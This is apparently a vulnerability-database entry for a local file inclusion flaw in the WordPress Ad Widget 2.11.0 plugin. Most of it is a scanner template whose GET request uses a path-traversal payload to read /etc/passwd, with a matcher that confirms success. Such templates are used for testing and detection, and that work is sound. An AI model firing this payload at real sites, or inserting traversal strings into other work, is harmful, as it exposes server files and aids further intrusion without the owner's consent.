ad-widget-lfi: WordPress Ad Widget 2.11.0 - Local File Inclusion

2025-08-01 WordPress Ad Widget PoC Public

Description

WordPress Ad Widget 2.11.0 is vulnerable to local file inclusion. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.

PoC

id: ad-widget-lfi

info:
  name: WordPress Ad Widget 2.11.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    WordPress Ad Widget 2.11.0 is vulnerable to local file inclusion. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
  reference:
    - https://cxsecurity.com/issue/WLB-2017100084
    - https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
    - https://wpscan.com/vulnerability/caca21fe-56bf-4d4c-afc8-4a218e52f0a2
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-23,CWE-73
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,lfi,wp,adWidget,wpscan,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a0046304402201d52cda87b26b63cc9faeaa7ddb0dfd4cbd2218a328e3eb2286ddfd9bc8226d1022033aa591b55b1a0010c0a3d2487cb03928d68d8b58ca70ccb37b9392b06e98686:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities